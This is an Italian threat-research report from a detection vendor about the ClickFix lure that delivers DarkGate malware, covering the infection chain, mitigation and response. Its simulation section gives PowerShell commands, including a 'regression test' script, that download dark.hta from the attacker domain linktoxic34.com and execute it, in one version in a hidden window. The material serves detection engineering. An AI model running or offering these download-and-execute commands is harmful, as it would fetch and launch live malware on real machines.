SOC Prime Bias: Medium

16 Dec 2025 18:07 UTC

Studio di Caso di ClickFix: Malware DarkGate

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Segui
Studio di Caso di ClickFix: Malware DarkGate
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sommario

Il rapporto descrive un metodo di social engineering chiamato ClickFix che persuade gli utenti a copiare ed eseguire un comando PowerShell, il quale quindi scarica un file HTA malevolo. Questo file HTA, a sua volta, scarica componenti aggiuntivi, incluso uno script AutoIt che crea directory, rilascia file e stabilisce comunicazioni C2. L’attività è attribuita alla campagna DarkGate e si basa su un’offuscazione base64 oltre a una manomissione degli appunti per evitare un rilevamento diretto.

Indagine

Gli analisti hanno svelato diversi strati di contenuto codificato in base64 incorporato in una falsa pagina di allerta per estensioni del browser e hanno recuperato il comando PowerShell responsabile del recupero di dark.hta da linktoxic34.com. Quando eseguito, l’HTA distribuisce un eseguibile AutoIt (fckhffh.a3x) che esegue una routine DES e avvia ulteriori payload. La telemetria di rete catturata mostra traffico HTTP(S) verso il dominio malevolo, seguito dall’esecuzione concatenata di script PowerShell.

Mitigazione

Le difese raccomandate includono la formazione degli utenti per scoraggiare la copia di frammenti di codice sconosciuti, la disabilitazione della finestra di dialogo Esegui di Windows tramite Criteri di Gruppo e il dispiegamento di soluzioni antivirus basate sul comportamento. Bloccare proattivamente il dominio malevolo e monitorare esecuzioni anomale di PowerShell può ridurre significativamente il rischio di infezione da DarkGate.

Risposta

Se viene identificato un evento correlato a ClickFix, isolare il punto terminale coinvolto, fermare tutti i processi malevoli, rimuovere gli artefatti HTA e AutoIt, e eseguire un’analisi forense su eventuali cartelle create durante l’intrusione. Aggiornare la logica di rilevamento per individuare modelli di esecuzione PowerShell e HTA sospetti ed assicurarsi che il dominio associato sia bloccato in tutto l’ambiente.

Flusso di Attacco

Esecuzione di Simulazione

Prerequisito: Il Controllo Pre-Voluto della Telemetria e Baseline deve essere superato.

Motivo: Questa sezione delinea l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta prevista dalla logica di rilevamento.

  • Narrativa di Attacco & Comandi:
    Un attaccante che ha ottenuto l’accesso con pochi privilegi su un host Windows compromesso desidera scaricare un payload HTA malevolo utilizzato nella campagna ClickFix. Per rimanere nascosto, l’attaccante utilizza PowerShell—uno strumento nativo di Windows—quindi non vengono introdotti binari esterni. Il comando viene eseguito direttamente nella console (o tramite un’attività pianificata) e include l’URL esatto che la regola osserva. Il download è archiviato nella directory %TEMP% dell’utente e poi eseguito tramite Start-Process.

    $url = "https://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta"
    $out = "$env:TEMPdark.hta"
    Invoke-WebRequest -Uri $url -OutFile $out
    Start-Process -FilePath $out
  • Script di Test Regressione: (autocontenuto, riproduce i passaggi sopra)

    # Simulazione download ClickFix HTA – attiva la regola Sigma
    $maliciousUrl = "https://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta"
    $destPath = "$env:TEMPdark.hta"
    
    try {
        Write-Host "[*] Scaricamento payload HTA malevolo..."
        Invoke-WebRequest -Uri $maliciousUrl -OutFile $destPath -UseBasicParsing
        Write-Host "[+] Scaricamento completo. Esecuzione del payload..."
        Start-Process -FilePath $destPath -WindowStyle Hidden
    } catch {
        Write-Error "Download o esecuzione falliti: $_"
    }
  • Comandi di Pulizia: (rimuove l’HTA scaricato e qualsiasi istanza in esecuzione)

    # Rimuovere il file HTA e terminare qualsiasi processo residuo
    $htaPath = "$env:TEMPdark.hta"
    if (Test-Path $htaPath) {
        Remove-Item $htaPath -Force
        Write-Host "[*] File HTA rimosso."
    }
    # Eliminare qualsiasi processo che potrebbe essere stato lanciato dall'HTA (esempio generico)
    Get-Process | Where-Object {$_.Path -like "*dark.hta*"} | Stop-Process -Force